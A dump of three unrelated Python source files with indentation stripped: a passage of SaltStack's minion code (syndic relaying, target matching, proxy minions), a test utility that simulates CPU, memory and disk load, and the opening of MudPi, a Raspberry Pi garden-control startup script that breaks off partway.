package = self.epull_sock.recv(zmq.NOBLOCK)
try:
self.handle_event(package)
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
# topic filtering is done at the zmq level, so we just strip it
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in six.iterkeys(self.poller.sockets):
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
def _setsockopts(self):
# no filters for syndication masters, unless we want to maintain a
# list of all connected minions and update the filter
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
self._set_ipv4only()
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
loop_interval = int(self.opts['loop_interval'])
self._fire_master_syndic_start()
while True:
try:
socks = dict(self.poller.poll(loop_interval * 1000))
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
except zmq.ZMQError:
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self._init_context_and_poller()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# register the event sub to the poller
self.poller.register(self.local.event.sub)
# Start with the publish socket
# Share the poller with the event object
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if self.event_forward_timeout is not None and \
self.event_forward_timeout < time.time():
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
idx = None
if messages_len == 1:
idx = 0
elif messages_len == 2:
idx = 1
else:
raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
payload = self.serial.loads(messages[idx])
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self._has_master = threading.Event()
# create all of the syndics you need
self.master_syndics = {}
for master in set(self.opts['master']):
self._init_master_conn(master)
log.info('Syndic waiting on any master to connect...')
# threading events are un-interruptible in python 2 :/
while not self._has_master.is_set():
self._has_master.wait(1)
def _init_master_conn(self, master):
'''
Start a thread to connect to the master `master`
'''
# if we are re-creating one, lets make sure its not still in use
if master in self.master_syndics:
if 'sign_in_thread' in self.master_syndics[master]:
self.master_syndics[master]['sign_in_thread'].join(0)
if self.master_syndics[master]['sign_in_thread'].is_alive():
return
# otherwise we make one!
s_opts = copy.copy(self.opts)
s_opts['master'] = master
t = threading.Thread(target=self._connect_to_master_thread, args=(master,))
t.daemon = True
self.master_syndics[master] = {'opts': s_opts,
'auth_wait': s_opts['acceptance_wait_time'],
'dead_until': 0,
'sign_in_thread': t,
}
t.start()
def _connect_to_master_thread(self, master):
'''
Thread target to connect to a master
'''
connected = False
master_dict = self.master_syndics[master]
while connected is False:
# if we marked it as dead, wait a while
if master_dict['dead_until'] > time.time():
time.sleep(master_dict['dead_until'] - time.time())
if master_dict['dead_until'] > time.time():
time.sleep(master_dict['dead_until'] - time.time())
connected = self._connect_to_master(master)
if not connected:
time.sleep(1)
self._has_master.set()
# TODO: do we need all of this?
def _connect_to_master(self, master):
'''
Attempt to connect to master, including back-off for each one
return boolean of whether you connected or not
'''
log.debug('Syndic attempting to connect to {0}'.format(master))
if master not in self.master_syndics:
log.error('Unable to connect to {0}, not in the list of masters'.format(master))
return False
minion = self.master_syndics[master]
try:
t_minion = Syndic(minion['opts'],
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
)
self.master_syndics[master]['syndic'] = t_minion
self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
self.master_syndics[master]['dead_until'] = 0
log.info('Syndic successfully connected to {0}'.format(master))
return True
except SaltClientError:
log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
# re-use auth-wait as backoff for syndic
minion['dead_until'] = time.time() + minion['auth_wait']
if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
minion['auth_wait'] += self.opts['acceptance_wait_time']
return False
# TODO: Move to an async framework of some type-- channel (the event thing underneath)
# doesn't handle failures well, and will retry 3 times at 60s timeouts-- which all block
# the main thread's execution. For now we just cause failures to kick off threads to look
# for the master to come back up
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_dict in self.iter_master_options(master_id):
if 'syndic' not in syndic_dict:
continue
if syndic_dict['dead_until'] > time.time():
log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master))
continue
try:
ret = getattr(syndic_dict['syndic'], func)(*args, **kwargs)
if ret is not False:
log.debug('{0} called on {1}'.format(func, master))
return
except (SaltClientError, SaltReqTimeoutError):
pass
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
# If the connection is dead, lets have another thread wait for it to come back
self._init_master_conn(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self.master_syndics.keys())
shuffle(masters)
if master_id not in self.master_syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self.master_syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# Share the poller with the event object
self.poller = self.local.event.poller
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
# check all of your master_syndics, have them do their thing
for master_id, syndic_dict in six.iteritems(self.master_syndics):
# if not connected, lets try
if 'generator' not in syndic_dict:
log.info('Syndic still not connected to {0}'.format(master_id))
# if we couldn't connect, lets try later
continue
next(syndic_dict['generator'])
# events
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return recieved with matching master_id, not forwarding')
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
self.functions = salt.loader.minion_mods(self.opts)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
match_suffix = results[-1]
if not (match_suffix == 'and' or match_suffix == 'or'):
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
work_simulator.py | '''
Copyright (C) 2021 S[&]T, The Netherlands.
'''
import multiprocessing
import os
import sys
import tempfile
import time
_MB = 2**20
class WorkSimulator:
'''
This class is responsible for consuming memory, CPU cycles and disk space.
It allocates memory and launches additional processes for each next CPU to
stress.
'''
def __init__(self, logger, time, nr_cpu, memory_mb, disk_space_mb,
nr_progress_log_messages, tmp_dir=''):
self._logger = logger
self._time = time
self._nr_cpu = int(nr_cpu)
self._memory_mb = int(memory_mb)
self._disk_space_mb = disk_space_mb
self._nr_progress_log_messages = nr_progress_log_messages
self._tmp_dir = tmp_dir
self._temp_file_name = None
@property
def temp_file_name(self):
# For unittest only
return self._temp_file_name
def _create_temp_file(self):
# Create file of defined size on disk, return file name
size = self._disk_space_mb * _MB
if size > 0:
CHUNK_SIZE = 1 * _MB
with tempfile.NamedTemporaryFile(prefix='tmp_procsim_', dir=self._tmp_dir, delete=False) as temp:
while size > 0:
amount = min(size, CHUNK_SIZE)
temp.write(os.urandom(max(amount, 0)))
size -= amount
self._temp_file_name = temp.name
temp.close()
self._logger.debug('Created temp file {} of {} MB'.format(temp.name, self._disk_space_mb))
def _remove_temp_file(self):
if self._temp_file_name is not None:
os.remove(self._temp_file_name)
self._logger.debug('Removed temp file {}'.format(self._temp_file_name))
self._temp_file_name = None
def _allocate_memory(self):
# TODO: Subtract current memory usage? That might be 20..100 MB!
self.memory_block = None
if self._memory_mb > 0:
try:
self.memory_block = bytearray(self._memory_mb * _MB)
except MemoryError:
self._logger.error('Out of memory allocating {} MB'.format(self._memory_mb))
self._logger.debug('Allocated {} MB of RAM'.format(sys.getsizeof(self.memory_block) // _MB))
def _free_memory(self):
self.memory_block = None
def _eat_cpu_cycles(self):
def do_work(step, nr_log_messages):
for progress in range(0, 100, step):
if nr_log_messages > 0:
self._logger.progress('Working, progress {}%'.format(progress))
now = time.time()
while now + self._time / nr_steps > time.time():
x = 2
# for n in range(25):
# x = x * x
if self._time > 0:
self._logger.debug('Start processing on {} cores'.format(self._nr_cpu))
nr_steps = max(self._nr_progress_log_messages, 1)
step = int(100 / nr_steps)
procs = []
for n in range(self._nr_cpu - 1):
proc = multiprocessing.Process(target=do_work, args=(step, 0))
procs.append(proc)
proc.start()
do_work(step, self._nr_progress_log_messages)
for proc in procs:
proc.join()
def start(self):
'''Blocks until done'''
self._create_temp_file()
self._allocate_memory()
self._eat_cpu_cycles()
self._free_memory()
self._remove_temp_file()
if __name__ == '__main__':
class LoggerStub():
def debug(self, *args, **kwargs):
print(*args, **kwargs)
def progress(self, *args, **kwargs):
print(*args, **kwargs)
def error(self, *args, **kwargs):
print(*args, **kwargs)
t = 10
memory_mb = 512
nr_cpu = multiprocessing.cpu_count()
disk_mb = 10
print("Run for {} seconds, use {} MB RAM, {} MB disk and {} cpu cores".format(t, memory_mb, disk_mb, nr_cpu))
logger = LoggerStub()
sim = WorkSimulator(logger, t, nr_cpu, memory_mb, disk_mb, 5)
sim.start()
|
mudpi.py | import RPi.GPIO as GPIO
import threading
import datetime
import socket
import time
import json
import sys
sys.path.append('..')
from action import Action
from config_load import loadConfigJson
from server.mudpi_server import MudpiServer
from workers.lcd_worker import LCDWorker
from workers.relay_worker import RelayWorker
from workers.camera_worker import CameraWorker
from workers.trigger_worker import TriggerWorker
from workers.pi_sensor_worker import PiSensorWorker
from workers.pi_control_worker import PiControlWorker
try:
# Does this prevent the need to install the module if you dont use it?
from workers.arduino_worker import ArduinoWorker
NANPY_ENABLED = True
except ImportError:
NANPY_ENABLED = False
try:
# Does this prevent the need to install the module if you dont use it?
from workers.adc_worker import ADCMCP3008Worker
MCP_ENABLED = True
except ImportError:
MCP_ENABLED = False
import variables
# __ __ _ _____ _
#| \/ | | | __ (_)
#| \ / |_ _ __| | |__) |
#| |\/| | | | |/ _` | ___/ |
#| | | | |_| | (_| | | | |
#|_| |_|\__,_|\__,_|_| |_|
# https://mudpi.app
CONFIGS = {}
PROGRAM_RUNNING = True
print(chr(27) + "[2J")
print('Loading MudPi Configs...\r', end="", flush=True)
#load the configuration
CONFIGS = loadConfigJson()
#Waiting for redis and services to be running
time.sleep(5)
print('Loading MudPi Configs...\t\033[1;32m Complete\033[0;0m')
time.sleep(1)
#Clear the console if its open for debugging
print(chr(27) + "[2J")
#Print a display logo for startup
print("\033[1;32m")
print(' __ __ _ _____ _ ')
print('| \/ | | | __ (_)')
print('| \ / |_ _ __| | |__) | ')
print('| |\/| | | | |/ _` | ___/ | ')
print('| | | | |_| | (_| | | | | ')
print('|_| |_|\__,_|\__,_|_| |_| ')
print('_________________________________________________')
print('')
print('Eric Davisson @theDavisson')
print('Version: ', CONFIGS.get('version', '0.8.6'))
print('\033[0;0m')
if CONFIGS['debug'] is True:
print('\033[1;33mDEBUG MODE ENABLED\033[0;0m')
print("Loaded Config\n--------------------")
for index, config in CONFIGS.items():
if config != '':
print('%s: %s' % (index, config))
time.sleep(10)
try:
print('Initializing Garden Control \r', end="", flush=True)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.cleanup()
#Pause for GPIO to finish
time.sleep(0.1)
print('Initializing Garden Control...\t\t\033[1;32m Complete\033[0;0m')
print('Preparing Threads for Workers\r', end="", flush=True)
threads = []
actions = {}
relays = []
relayEvents = {}
relay_index = 0
variables.lcd_message = {'line_1': 'Mudpi Control', 'line_2': 'Is Now Running'}
new_messages_waiting = threading.Event() #Event to signal LCD to pull new messages
main_thread_running = threading.Event() #Event to signal workers to close
system_ready = threading.Event() #Event to tell workers to begin working
camera_available = threading.Event() #Event to signal if camera can be used
main_thread_running.set() #Main event to tell workers to run/shutdown
time.sleep(0.1)
print('Preparing Threads for Workers...\t\033[1;32m Complete\033[0;0m')
#l = LCDWorker(new_messages_waiting,main_thread_running,system_ready)
#print('Loading LCD Worker')
#l = l.run()
#threads.append(l)
# Worker for Camera
try:
c = CameraWorker(CONFIGS['camera'], main_thread_running, system_ready, camera_available)
print('Loading Pi Camera Worker')
c = c.run()
threads.append(c)
camera_available.set()
except KeyError:
print('No Camera Found to Load')
# Workers for pi (Sensors, Controls, Relays)
try:
for worker in CONFIGS['workers']:
# Create worker for worker
if worker['type'] == "sensor":
pw = PiSensorWorker(worker, main_thread_running, system_ready)
print('Loading Pi Sensor Worker...')
elif worker['type'] == "control":
pw = PiControlWorker(worker, main_thread_running, system_ready)
print('Loading Pi Control Worker...')
